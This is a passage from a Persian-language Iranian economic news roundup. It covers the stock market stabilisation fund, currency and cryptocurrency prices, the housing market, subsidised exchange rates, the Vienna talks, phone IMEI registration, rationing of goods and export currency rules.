رییس هیئت عامل صندوق تثبیت بازار سرمایه خاطرنشان کرد: مطابق با مصاحبه و اعلام رییس هیات عامل صندوق توسعه ملی در رسانه ها، قرار بود آن صندوق دو هزار و ۵۰۰ میلیارد تومان دیگر را در سال ۱۳۹۹ در صندوق تثبیت بازار سپرده گذاری کند اما تاکنون هیچ اقدامی در این زمینه انجام نشده است.

سازمان بورس، صندوقی را تحت عنوان صندوق تثبیت بازار سرمایه در اختیار دارد که درصدی از کارمزد معاملات و درآمد سازمان به منظور حفظ نقدشوندگی وارد این صندوق می‌شود.

نکته قابل توجه برای استفاده از این صندوق‌ها این است که در شرایط عادی و طبیعی بازار نمی‌توان از منابع این صندوق استفاده کرد، بلکه استفاده از آن بیشتر برای روزهایی است که اتفاق پیش‌بینی نشده‌ای رخ می‌دهد که به شدت بر روند کوتاه‌مدت بازار تاثیرگذار باشد و قیمت سهام با کاهش شدید مواجه ‌شود، با توجه به وضع پیش آمده منابع این صندوق در این موقعیت بنا بر صلاحیت مدیریت، وارد سمت تقاضا در بازار می‌شود و از طریق جمع‌آوری صف‌های فروش، قیمت‌ها را به ثبات می‌رسانند.

سازمان بورس برای حمایت از بازار در برخی مواقع که اتفاق بحرانی در این بازار رخ می‌دهد و نیازمند نقدینگی می‌شود از منابع موجود در این صندوق استفاده می‌کند و از این طریق، معاملات بازار را به ثبات می‌رساند.

نقدینگی موجود در این صندوق ممکن است از طریق صندوق توسعه ملی و صندوق توسعه ارزی تامین شود و در آخر، سازمان بورس به واسطه این صندوق‌ها معاملات بازار را کنترل خواهد کرد، این اقدام و استفاده از منابع این صندوق نیازمند ارزنده بودن قیمت سهام و دور بودن آن سهم از قیمت حبابی است در غیر این صورت نمی‌توان از سهم مورد نظر حمایت کرد.

 

۱۱ : خبر مهم همتی درباره مطالبات ارزی بانک ها

رییس کل بانک مرکزی درخصوص درخواست فعالین بازار سرمایه برای اصلاح نرخ تسعیر دارایی های ارزی بانک ها توضیحاتی ارائه داد.

عبدالناصر همتی رییس کل بانک مرکزی در اینستاگرام خود نوشت: درخصوص درخواست فعالین بازار سرمایه برای اصلاح نرخ تسعیر دارایی های ارزی بانک ها، ذکر چند نکته ضروری است:

دارایی‌های ارزی بانک ها، عمدتا مطالبات از بنگاه ها هستند و بخشی از آن هم به دلیل تحریم مسدودند. وصول مطالبات ارزی بعض معوق، در نرخ های فعلی ارز در بازار، مشکلات خودش را دارد.

تسعیر مطالبات ارزی بانک ها درنرخ بالاتر، شناسایی درآمدموهومی بیشتر وسود بی کیفیت ولذا، ارائه عملکرد غیر واقعی و پرداخت مالیات نقدی است.

بانک مرکزی آماده اصلاح نرخ تسعیر دارایی های ارزی بانک ها، متناسب با نرخ تسعیر متناسب با شرایط غیرتحریمی است. بانک مرکزی برای مؤثر واقع شدن اصلاح نرخ تسعیر ارز در قیمت سهام بانک ها معتقد است اعطای معافیت مالیات سود ناشی از تسعیر، تا زمان نقد شدن آن ها ضروری است.

 

۱۲ : پیش بینی های عجیب درباره آینده بیت کوین

با تردید نسبت به روند بلندمدت بیت کوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است

ارزش بیت کوین و بیشتر رمزارزها پس از چند روز نزولی، بلاخره بالا رفت.

با وجود اصلاح عمیق بازار ارزهای دیجیتالی در چهارمین هفته ماه آوریل، دن مورهد- مدیر شرکت پنترا کپیتال- از ورود شرکت های بزرگ به عرصه سرمایه گذاری در بازار و احتمال تصویب قوانین مبادلات رمزارزها به عنوان دو عاملی نام برده است که می توانند زمینه ساز رسیدن بیتکوین به قیمت ۲۰۰ هزار دلار تا سال ۲۰۲۲ شود. وی همچنین پیش بینی کرده است تا ۲۰۲۲ حدود یک میلیون کاربر جدید در جهان به بازار بیتکوین اضافه شود.

بورس کانادا که یکی از پیشتازترین بورس های جهان در عرصه ارزهای دیجیتالی شناخته می شود با ورود یک صندوق بورسی مبتنی بر رمزارز دیگر موافقت کرد. بدین ترتیب، اکنون چهار ETF که مبتنی بر ارزهای دیجیتالی هستند در بورس تورنتو لیست شده اند. این صندوق بورسی بر پایه رمزارز اتریوم که اکنون دومین رمزارز بزرگ دنیا محسوب می شود، به فعالیت های سرمایه گذاری خواهد پرداخت.

با تردید نسبت به روند بلندمدت بیت کوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است تا جایی که اکنون تعداد نهنگ های اتریوم که ۱۰ هزار عدد اتریوم یا بیشتر از این رمزارز در اختیار دارند، به رکورد تاریخی تازه ای رسیده است. استفان ایزاک- مدیر موسسه الوین کپیتال- گفت: پایان بیتکوین اجتناب ناپذیر است. نگرانی های محیط زیستی و قانون گذاری های دولتی سرنوشت حتمی بیتکوین را رقم می زنند. نمی دانم چگونه و چه طور، اما پایان بیتکوین رقم خواهد خورد.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱۸۶۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۱.۰۹ درصد بیشتر شده است. در حال حاضر ۵۲ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۷ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۴۹ هزار و ۷۸۵.۶۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۲۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۰.۴۰ درصد کاهش

۲- اتریوم

قیمت: ۲۳۰۸.۱۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۶.۹۳ درصد افزایش

۳- بایننس کوین

قیمت: ۵۰۴.۱۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۸۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۶.۶۷ درصد افزایش

۴- ریپل

قیمت: ۱.۰۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۹۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۷.۲۷ درصد کاهش

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۱ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۳ درصد کاهش

۶- کاردانو

قیمت: ۱.۱۲ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۶۴ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۹.۸۴ درصد کاهش

۷- دوج کوین

قیمت: ۰.۲۴۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۷.۶۶ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۶.۵۴ درصد کاهش

۸- پولکا دوت

قیمت: ۲۹.۸۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۸.۴ درصد کاهش

۹- یونی سواپ

قیمت: ۳۳.۰۶ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۹.۲۲ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۷.۷۹ درصد افزایش

۱۰- لایت کوین

قیمت: ۲۲۷.۱۸ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۷۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۴.۳۳ درصد کاهش

 

۱۳ : دلار در حال ریزش

بازار آزاد امروز شاهد افت قیمت دلار است که با ریزش ۱۵۰ تومانی به ۲۳۷۲۰ (بیست و سه هزار و هفتصد و بیست ) تومان رسید.

قیمت دلار امروز در بازار روند نزولی را نسبت به روز پیش تجربه کرد.

قیمت دلار در بازار آزاد امروز
دلار در بازار آزاد، امروز به ۲۳۷۲۰ (بیست و سه هزار و هفتصد و بیست ) تومان رسید که نسبت به روز قبل ، کاهش ۰.۶۴ درصدی داشته است.

قیمت دلار و یورو در صرافی ملی (۱۴۰۰/۰۲/۰۶)
آخرین نرخ دلار در بازار متشکل
دلار در بازار متشکل امروز با کاهش ۰.۰۳ درصدی، از ۲۳۱۴۰ (بیست و سه هزار و یکصد و چهل ) تومان به ۲۳۱۳۴ (بیست و سه هزار و یکصد و سی و چهار ) تومان رسید.

یورو در بازار آزاد امروز با کاهش ۰.۷۱ درصدی، از ۲۸۸۹۲ (بیست و هشت هزار و هشتصد و نود و دو ) تومان به ۲۸¡۶۹۱ (بیست و هشت هزار و ششصد و نود و یک ) تومان رسید.

آخرین نرخ پوند
در بازار امروز پوند نسبت به روز قبل ، با ۱۳۵ تومان کاهش، ۳۲۹۹۶ (سی و دو هزار و نهصد و نود و شش ) تومان نرخ گذاری شد.

آخرین نرخ درهم امارات (حواله)
درهم امارات (حواله) امروز با کاهش ۱.۳۹ درصدی، از ۶۵۹۰ (شش هزار و پانصد و نود ) تومان به ۶¡۵۰۰ (شش هزار و پانصد ) تومان رسید.

آخرین نرخ لیر ترکیه
همچنین لیر ترکیه با کاهش ۰.۷ درصدی نسبت به روز قبل ، ۲۸۳۰ (دو هزار و هشتصد و سی ) تومان معامله شد.

قیمت دلار کانادا امروز
دلار کانادا در بازار داخلی هم ۱۹۰۲۱ (نوزده هزار و بیست و یک ) تومان قیمت خورد.

 

۱۴ : بازار مسکن سکته کرد!

رئیس اتحادیه صنف مشاوران املاک کشور گفت: ما معتقدیم که قیمت ملک حداقل باید ۳۰ درصد کاهش پیدا کند اما بعضی بساز و بفروش ها نمی خواهند باور کنند که قیمت ملک کاهش دارد.

رئیس اتحادیه صنف مشاوران املاک کشور با اشاره به اینکه بازار مسکن در حال حاضر گیج است، گفت: مصرف کننده انتظار دارد قیمت مسکن کاهش یابد و فروشنده منتظر بالا رفتن قیمت است و با توجه به اینکه ماه رمضان و انتخابات ریاست جمهوری را هم در پیش رو داریم ابهامات بازار بیشتر شده است.

مصطفی قلی خسروی با بیان اینکه ابهامات قیمتی باعث رکود در بازار شده است، افزود: در حال حاضر فردی که می خواست واحد سه خوابه بخرد، دو خوابه خرید و فردی که دوخوابه می خواست یک خوابه خریده و فردی که یک خوابه می خواست، مجبور به رهن کامل یک واحد شده است؛ در کل وضعیت نشان دهنده رونق معاملات مسکن نیست. رونق بازار زمانی حاصل می شود که فردی واحد دو خوابه را تبدیل به سه خوابه کند، آنگاه می توان گفت رونق در بازار حاصل شده است.

وی با بیان اینکه وقفه در بازار مسکن باعث بروز سکته در این بازار شده است، تصریح کرد: در شرایط کنونی باید منتظر تاثیر تصمیمات جدید شد، برای نمونه سامانه املاک که از ۱۹ فروردین امسال فعالیت خود را آغاز کرده و تا دو ماه دیگر مردم باید اطلاعات املاک خود را وارد سامانه کنند، تاکنون تاثیری در معاملات نداشته است، اما از آنجایی که خانه های بالای ۱۰ میلیارد تومانی مشمول مالیات شده اند، اجرای این مصوبه منجر به افزایش عرضه و کاهش قیمت املاک در کشور می شود؛ از طرف دیگر باید توجه داشت که در حال حاضر رکود موجود در بخش مسکن تورمی نیست به همین دلیل قیمت ها بیشتر روندی نزولی دارد.

او با تاکید بر اینکه برجام ربطی به بازار مسکن ندارد، تصریح کرد: وزیر راه و شهرسازی اعلام کرده است که قیمت مسکن باید در سال جاری ۲۵ درصد کاهش یابد، اما ما معتقدیم که قیمت مسکن باید بیش از این کاهش یابد و این افزایش قیمتی که در تهران رخ داده در تمام کشور تاثیر گذاشته است و بنابراین کاهش قیمت ها هم باید در تمام استان ها به وجود بیاید.

رئیس اتحادیه صنف مشاوران املاک کشور با اشاره به اینکه جدول قیمت تمام شده ساخت املاک در کشور با نرخ های بسیار پایین تری از آنچه که بساز و بفروش ها اعلام می کنند منتشر شده است، گفت: در حال حاضر مشکل اینجاست که برای نخود و لوبیا در کشور ستاد تنظیم بازار داریم، اما برای بازار مسکن چنین ستادی نداریم و با وجود اینکه قیمت ساخت در کشور بسیار پایین تر از قیمت هایی است که امروز در معاملات گفته می شوند اما معاملات انجام می شود و متاسفانه نظارت هم بر این بخش ضعیف است، بنابراین روند قیمت ها باید رو به کاهش برود، هرچند عده ای از بساز و بفروش ها نمی خواهند باور کنند که قیمت ملک پایین می آید.

او درباره دلایل گرانی قیمت مسکن در کشور، گفت: در یک دوره ای بخش خصوصی مسکن می ساخت و به آن ها اعلام می شد که نباید بیشتر از ۳۰ درصد سود از مصرف کننده ها بگیرند، اما در حال حاضر بانک ها و ارگان های دولتی ساخت و ساز می کنند و از تسهیلات دولتی هم استفاده می کنند و در نهایت باعث گرانی قیمت مسکن هم شده اند، از این رو امروز ما به عنوان کارشناس بخش مسکن معتقدیم که بخش هایی همچون بانک ها و ارگان های دولتی باید از ساخت و ساز بیرون بروند چراکه اتفاقاتی که در چند سال اخیر در بخش مسکن بروز کرد در نتیجه عملکرد این نهادهاست و با عرضه گران مسکن به بازار عملا قیمت ها را به طرز وحشتناکی بالا بردند.

 

۱۵ : درخواست اتاق بازرگانی از رئیس جمهور برای حذف ارز دولتی دارو و کالاهای اساسی

رئیس اتاق بازرگانی تهران گفت: فعالان بخشی خصوصی در دیدار با رئیس جمهور خواستند که در جهت تسریع واردات دارو و کالاهای اساسی ارز ۴۲۰۰ تومانی این کالاها حذف و یارانه ریالی از مسیر دیگری به مردم پرداخت شود.

مسعود خوانساری، در دیدار فعالان اقتصادی با رئیس‌جمهور که شامگاه دوشنبه ششم اردیبهشت ماه و با رعایت اصول بهداشتی و پروتکل‌های حفاظت از کرونا برگزار شد به دو مساله تحریم و دیوانسالاری دولتی اشاره و از چالش‌های ایجاد شده برای فعالان اقتصادی از این دو محور گفت.

رئیس اتاق بازرگانی تهران با اشاره به این که رسم هر سال است که رئیس‌جمهور، برای دیدار و طرح مشکلات از کارآفرینان دعوت می‌کند، تاکید کرد که در سال جاری به دلیل همه‌گیری کرونا، این مراسم محدودتر از سال‌های گذشته برگزار شد.

وی عنوان کرد که مدعوین این نشست عمدتا از شرکت‌های دانش‌بنیان، شرکت‌های فعال در حوزه دارو، ساختمان، صادرات، پلیمر و  نساجی بودند.

خوانساری افزود: در فرصت کوتاهی که پیش آمد، در این نشست درباره دو موضوع صحبت شده که موضوع نخست، کنترل تحریم و تلاش برای وخیم‌تر نشدن وضعیت بود که انصافا دولت در این مورد موفق عمل کرد و اجازه نداد که کار کشور به بحران بزرگی برسد که در ذهن ترامپ بود. موضوع دوم هم مساله دیوانسالاری بود که در حال حاضر به بزرگترین پاشنه آشیل دولت تبدیل شده و کار را برای بخش خصوصی بسیار دشوار کرده است. با صدور مجوزهای بیش از اندازه، وجود امضاهای طلایی و صدور روزانه بخشنامه‌های متعدد که در عمل، مخل کسب وکار است، بخش خصوصی امنیتی برای سرمایه‌گذاری احساس نمی‌کند.

خوانساری ادامه داد: به این ترتیب، رشد سرمایه‌گذاری طی سال‌های گذشته نسبت به استهلاک منفی شده و در عمل خروج سرمایه شتاب گرفته است. تنها راه مقابله با این وضعیت، کاهش دیوانسالاری وکاهش دخالت دولت درتصدی‌گری و اقتصاد است.

رئیس اتاق بازرگانی تهران توضیح داد: واکسن کرونا از دیگر دغدغه‌های فعالان بخش خصوصی است که در دیدار با رئیس‌جمهور به آن اشاره کردم. ابتلای یک نفر در یک بنگاه تولیدی باعث نگرانی دیگر کارگران و ایجاد تشنج در محیط خواهد شد. بنابراین، برای رفع نگرانی کارگران و کارفرمایان از رئیس‌جمهور خواستیم به فرآیند واردات واکسن سرعت بدهند.

خوانساری با اشاره به فضای کلی این نشست عنوان کرد که دیگر کارآفرینان و فعالان اقتصادی حاضر در این نشست هم به مشکلات مختلف حوزه فعالیت خود اشاره کردند از جمله شرکت‌های دانش‌بنیان اعلام کردند در چند سال اخیر رشد این شرکت‌ها خوب بوده اما بوروکراسی اداری مانع رشد سریع‌تر آنها شده است.

وی افزود: صادرکنندگان عمدتا به مشکلات سال‌های گذشته اشاره کردند که رفع شده است. فعالان در حوزه دارو به مسئله تخصیص ارز اشاره کردند که اگر به موقع انجام نشود، زمینه‌ساز کمبود در بازار است و تخصیص ارز ۴۲۰۰ تومانی را عامل کمبودها دانستند و اشاره کردند که اگر واردکنندگان از ارز آزاد استفاده کنند، واردات تسریع می‌شود. همین مسئله در مورد کالاهای اساسی هم مطرح شد که اگر ارز غیرترجیحی به واردات این کالاها تخصیص داده و یارانه ریالی از مسیر دیگری پرداخت شود، شاهد کمبود کالا در بازار نخواهیم بود.

خوانساری بیان داشت: در ادامه  رئیس‌جمهور به چند مورد از دستاوردهای دولت اشاره کردند و قرار شد،  نهاوندیان معاون اقتصادی رئیس‌جمهور مشکلات مطرح شده توسط کارآفرینان و فعالان اقتصادی را دسته‌بندی کرده و حل مسائل را در ۱۰۰ روز باقی مانده پیگیری کند.

 

۱۶ : خطر خوش بینی کاذب درباره دستاورد‌های احتمالی مذاکرات وین

یکی از آسیب‌های اصلی در مسیر رفع تحریم ها، تحریف در بیان حقایق مذاکرات وین است. ایجاد خوش بینی کاذب درباره دستاورد‌های احتمالی وین نه تنها مردم را مأیوس خواهد ساخت، بلکه به لحاظ مذاکراتی نیز تیم مذاکره کننده ایران را در موضع ضعف قرار خواهد داد.

در گزارش مرکز پژوهشهای مجلس با عنوان “مذاکرات هسته‌ای وین از گفتمان تا واقعیت” در خصوص مذاکرات و رفع تحریمها آمده است: نشست‌های کمیسیون مشترک برجام در وین با دستورکار گفتگو پیرامون بازگشت آمریکا به توافق هسته‌ای درحال برگزاری است. در کمتر از یک ماه گذشته، این کمیسیون یک نشست مجازی و دو نشست حضوری داشته است. بیم و امید‌هایی درباره چگونگی برگزاری این نشست‌ها و سرانجام آن وجود دارد.

محرمانگی مذاکرات و عدم ارائه جزئیات گفتگو‌ها سبب بروز روایت‌های گوناگونی از وین شده است. نوع خوانش آمریکا و اروپا از روند مذاکرات با آنچه در ایران بیان می‌شود نه تنها چندان همسو نیست، بلکه در برخی موارد در تضاد با یکدیگر است. بررسی تکه‌های این پازل نشان می‌دهد تصویری که از مذاکرات وین در فضای داخلی ایران درحال ساخته شدن است با آنچه در وین در جریان است تفاوت معناداری دارد و کلید فهم وضعیت کنونی پرونده هسته‌ای و تصمیم گیری درباره آن در تبیین این تفاوت است.

یکی از آسیب‌های اصلی در مسیر رفع تحریم ها، تحریف در بیان حقایق مذاکرات وین است. ایجاد خوش بینی کاذب درباره دستاورد‌های احتمالی وین نه تنها مردم را مأیوس خواهد ساخت، بلکه به لحاظ مذاکراتی نیز تیم مذاکره کننده ایران را در موضع ضعف قرار خواهد داد. ازاین رو، قضاوت صحیح درباره وین و تصمیم گیری درباره چگونگی استمرار آن در گرو ارائه یک روایت واقع بینانه از چالش‌ها و موانع دستیابی به یک تفاهم مشترک برای بازگشت به برجام و نیز مدیریت آسیب‌ها و اشتباهاتی است که تحقق این هدف را تهدید می‌کند.

آمریکا در آستانه انتخابات ریاست جمهوری ایران در تلاش است تا به گونه‌ای فضای روانی را مدیریت کند که در عین مداخله و اثرگذاری بر نتایج انتخابات بتواند یک توافق بد را به ایران تحمیل کند. این هدفگذاری آمریکا ناشی از آن است که این کشور احتمال می‌دهد برخی در ایران به دلیل نیاز کوتاه مدت و در پیش بودن انتخابات بار دیگر برمبنای قاعده خطرناک «هر توافقی بهتر از توافق نکردن است» تصمیم گیری کنند. چنین نگاهی به مذاکره و تعجیل در به سرانجام رساندن آن به دلیل غفلتی که نسبت به ابعاد و جزئیات مهم رفع تحریم‌ها ایجاد می‌کند، دریچه انتفاع اقتصادی ایران از هرگونه نتیجه‌ای را تنگ‌تر خواهد کرد.

 

۱۷ : رجیستری شناسه تلفن همراه رایگان شد

از این پس گوشی‌هایی که از مبادی قانونی به‌صورت مسافری و تجاری وارد کشور می‌شوند، برای ثبت شناسه رهگیری (IMEI) در رجیستری، تعرفه‌ای پرداخت نمی‌کنند.

سامانه اطلاع‌رسانی طرح ثبت تلفن همراه اعلام کرد از این پس گوشی‌هایی که از مبادی قانونی به‌صورت مسافری و تجاری وارد کشور می‌شوند، برای ثبت شناسه رهگیری (IMEI) در رجیستری، تعرفه‌ای پرداخت نمی‌کنند.

در بحث رجیستری تلفن همراه دو دسته هزینه وجود دارد. یک بخش از هزینه‌ها گمرکی هستند که شامل حقوق، عوارض گمرکی و سود بازرگانی است که در سامانه جامع امور گمرکی (EPL) پرداخت می‌شود. تلفن همراه به هر صورتی (مسافری – بازرگانی) وارد کشور شده باشد، باید این هزینه را پرداخت کند.

هزینه دیگر مربوط به ثبت شناسه رهگیری تلفن همراه یا IMEI تلفن همراه است. پس از پرداخت هزینه عوارض تلفن همراه برای فعال شدن دستگاه در شبکه ارتباطی کشور فعال، باید IMEI آن در سایت همتا ثبت شود.

اواخر سال ۹۸ هیچ هزینه‌ای بابت رجیستری IMEI تلفن همراه در سامانه همتا دریافت نمی‌شد و این فرآیند کاملا رایگان بود. بعد از مدتی برآوردی انجام شد که نشان می‌داد هزینه ارسال پیامک و انجام فرآیند مربوط به رجیستری IMEI تلفن همراه در سامانه برای هر گوشی همراه مبلغ ۳هزار و ۷۴ تومان است.

پس از برآورد هزینه با مصوبه هیئت دولت، این مبلغ از کاربران دریافت می‌شد. تاریخ این مصوبه اول اردیبهشت به پایان رسید و به همین دلیل سامانه همتا اعلام کرد از این پس گوشی‌هایی که از مبادی قانونی به‌صورت مسافری و تجاری وارد کشور می‌شوند، برای ثبت شناسه رهگیری (IMEI) در رجیستری، تعرفه‌ای پرداخت نمی‌کنند.

 

۱۸ : سهمیه بندی کالاهای اساسی در راه است؟

در اخبار روز گذشته، اعلام شد که شکر تا اطلاع سهیمه‌بندی توزیع می‌شود و تجربه‌ای که برای کره، روغن، مرغ و نهاده‌ها در سال گذشته رخ داد، اکنون به جان یک کالای دیگر افتاده است.

با توجه به افزایش قیمت برخی از کالاهای اساسی در کشور از ابتدای سال ۹۶، دولت عزم خود را برای سرکوب قیمت‌ها و مداخلات قهرمانانه در بازار جزم کرد. از تخصیص یارانه ارز ترجیحی (که خود با سرکوب قیمت ارز همراه بود) تا توزیع کالا از محل ذخایر دولتی با ارقام رانتی و مصوب و سپس در پایان اعلام ممنوعیت‌ها و مجازات‌ها و دستگیری سلطان‌های موهوم و در آخر رها کردن بازار به حال خودش، می‌توان چرخه رفتاری مداخله دولت در بازار هر کالا را مشاهده کرد.

تورم عامل اصلی کمبود کالاها
این استاد دانشگاه در پاسخ به این پرسش که چرا کمیابی کالاها در کشور طولانی می‌شود و دست مرئی دولت در این زمینه چه نقشی دارد، اظهار داشت: ببینید دولت می‌تواند اولین نقش خود برای ایجاد کمبود کالا را از طریق افزایش تورم اعمال کند. وقتی تورم افزایش پیدا کند، یعنی شیرازه پولی یک کشور درهم ریخته است و کاسبان برای حفظ دارایی و سرمایه خود اقدام به نوسان‌گیری و انباشت کالا می‌کنند که در ادبیات بوروکراتیک ایران، به آن احتکار می‌گویند. دولت در این شرایط برای این که نتایج و آثار سوء عملکرد خود در ایجاد تورم و افزایش نقدینگی را ماستمالی کند، اقدام به مداخلات آنچنانی در کار بازار می‌کند. یا یک کالا را بیش از اندازه خریداری کرده (و از این طریق کمبود ایجاد کرده) و آن را به نرخی پایین‌تر از نرخ بازار می‌فروشد و یا برخوردهای تعزیراتی زننده‌ای با اهالی تجارت و فعالین اقتصادی می‌کند.

وی افزود: در فرآیند بسیار پیچیده و غیرقابل برنامه‌ریزی معاملات بازار، کمبود و مازاد کالاها در بازه زمانی کوتاه مدت امر طبیعی است. مشکل از جایی شروع می‌شود که تزریق‌عدم قطعیت به اقتصاد بسیار زیاد می‌شود و پس از آن نیز عامل بروزعدم قطعیت، خودش را در نقش یک قهرمان قرار می‌دهد. یعنی دولت در عمل باعث طولانی شدن دوران کمبود کالاها می‌شود. از طرفی، یک توهم در میان برنامه‌ریزان اقتصاد دولتی ما وجود دارد که دولت باید با خریداری برخی کالاهای به زعم خودش استراتژیک و ذخیره کردن در انبارها، سردخانه‌ها و سیلوهایش، بازار را در آینده بتواند مدیریت کند. نتیجه این اقدام کمبود کالا و از سوی دیگر بهم ریختگی نظم طبیعی بازار است. نمونه‌اش را در گندیده شدن میوه‌های ذخیره شده برای شب عید مشاهده کنید که هم دسترنج کشاورزان نابود شد و هم منابع بیت‌المال اتلاف شد!

دولت هنری جز سهمیه‌بندی و توزیع جیره‌ای ندارد
کامران ندری در ادامه خاطرنشان ساخت: اقدام به سهمیه‌بندی کردن شکر، دستور برای ممنوعیت فروش قطعات مرغ، ایجاد محدودیت برای فروش روغن و کره، اعمال محدودیت برای فروش و خرید تخم‌مرغ، در هیچ منطق علمی و عقلی اقتصادی پذیرفتنی نیست. حتی اعمال سهمیه‌بندی برای فروش بنزین را هم می‌توان به این شاهکار فقدان عقلانیت در دولت افزود. درباره شاهکار ارز ترجیحی که با سرکوب قیمت دلار همراه بود هم که خودتان همه چیز را به یاد می‌آورید و زمان زیادی سپری نشده است.

آزادی انتخاب کالا را به رسمیت بشناسیم
این اقتصاددان در پایان ضمن مردود دانستن این رویه دولت، هشدار داد: در صورتی که دولت‌ها الزامات بازار آزاد را در اقتصاد نپذیرند، در مرحله نخست مداخلاتشان، انتخاب‌های مردم را به دو دسته لوکس و اساسی تقسیم‌بندی می‌کنند و در فرایندی که به لحاظ زمانی زیاد طول نمی‌کشد، از فهرست این کالاهای اساسی نیز یکی یکی کم می‌شود تا جایی که مشابه با ونزوئلا دستمال توالت و پوشک بچه را در فهرست کالاهای لوکس اعلام شده توسط دولت مشاهده می‌کنیم. باید بپذیریم که تنها راه عبور از این کمبودهای مقطعی، تن دادن به راهکار آزادی انتخاب مردم در بازار است. در غیر این صورت باید منتظر سهمیه‌بندی فهرست مطولی از کالاهای گوناگون باشیم.

 

۱۹ : راه‌های نهایی بازگشت ارز به کشور چیست؟

با گذشت حدود سه سال از اجرای تعهدات ارزی صادرکنندگان، سرانجام تکلیف ارزهای باقی مانده از سال ۱۳۹۷ تا ۱۴۰۰ روشن شد.

تعهدا ارزی، برنامه‌ای بود که از سوی دولت و پس از بازگشت تحریم‌های امریکا وضع شد تا به این ترتیب صادرکنندگان غیرنفتی ملزم شوند، ارز حاصل از فروش محصولات خود در بازارهای بین لمللی را به کشور بازگردانند تا محدودیتی در تامین ارز مورد نیاز برای واردات کالاهای اساسی به کشور به وجود نیاید.

در طول سال‌های گذشته، اختلاف نظرهای فراوانی میان بخش خصوصی و بانک مرکزی در مسیر اجرا این تعهد وجود داشته و دو طرف بارها یکدیگر را به عدم عمل به تعهداتشان متهم کرده‌اند، با این وجود با آرامش نسبی به وجود آمده در ماه‌های اخیر، به نظر می‌رسد بانک مرکزی سرانجام تکلیف صادرکنندگان باقی مانده از  سال ۱۳۹۷ تا ۱۴۰۰ را روشن کرده و با تصویب بسته سیاستی برگشت ارز حاصل از صادرات سال‌های ۱۳۹۷ تا ۱۴۰۰ در جلسه کمیته ماده (۲) شورای عالی هماهنگی اقتصادی، ایفای تعهدات ارزی صادرکنندگان تعیین تکلیف شده است.

به این ترتیب، صادرکنندگان سال ۱۳۹۸ تا پایان تیرماه ۱۴۰۰ و صادرکنندگان سال ۱۳۹۹ تا پایان شهریورماه ۱۴۰۰ مهلت دارند تا با ایفای تعهدات ارزی صادراتی خود از معافیت‌های مربوطه بهره‌مند شوند.

همچنین طبق این مصوبه، صادرکنندگان سال‌های ۱۳۹۸ و ۱۳۹۹  مکلفند ۹۰ درصد ارزش پروانه‌های صادراتی اعلامی توسط گمرک را به چرخه اقتصادی کشور برگردانند.

بر اساس این مصوبه، روش‌های برگشت ارز حاصل از صادرات نیز به طرق، فروش ارز در سامانه نیما، واردات در مقابل صادرات خود، واگذاری ارز حاصل از صادرات به غیر، بازپرداخت بدهی تسهیلات ارزی و فروش ارز به صورت اسکناس به بانک‌ها و صرافی‌های مجاز، تعیین شده‌است.

در کنار صادرکنندگان ارزی، در دستور العمل جدید وضعیت صادرکنندگان ریالی نیز تعیین تکلیف شده است. صادرکنندگانی که نسبت به فروش ریالی کالاهای صادراتی در بازه زمانی ۲۲ فروردین ۱۳۹۷ تا ۱۶ مرداد ۱۳۹۷  به عراق و افغانستان اقدام کرده و در موعد مقرر نسبت به ثبت اطلاعات فروش ریالی خود در سامانه جامع تجارت اقدام نکرده‌اند، حداکثر تا ۳۱ خرداد ۱۴۰۰  فرصت دارند تا با ثبت اطلاعات فروش ریالی در این سامانه نسبت به رفع تعهدات ارزی خود اقدام کنند.

 

۲۰ : اجازه استخراج رمز ارز را برای پرداخت واردات صادر شد

بانک مرکزی ایران به موسسات مالی کشور اجازه داده است تا در شرایط تحریم با کمک استخراج گران رمزارز، برای پرداخت واردات استفاده کنند.

بر اساس گزارشی که روز شنبه توسط فایننشیال تریبون منتشر شد، بانک مرکزی ایران (CBI) گفته در چارچوب وظایف نظارتی اصلاح شده خود به موسسات اجازه می‌دهد هزینه کالاها و خدمات سایر کشورها را در تلاش برای دور زدن تحریم‌های اقتصادی ایالات متحده پرداخت کنند

برخی می‌گویند صنعت استخراج پول‌های رمزی محلی می‌تواند روزانه ۲ میلیون دلار درآمد کسب کند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران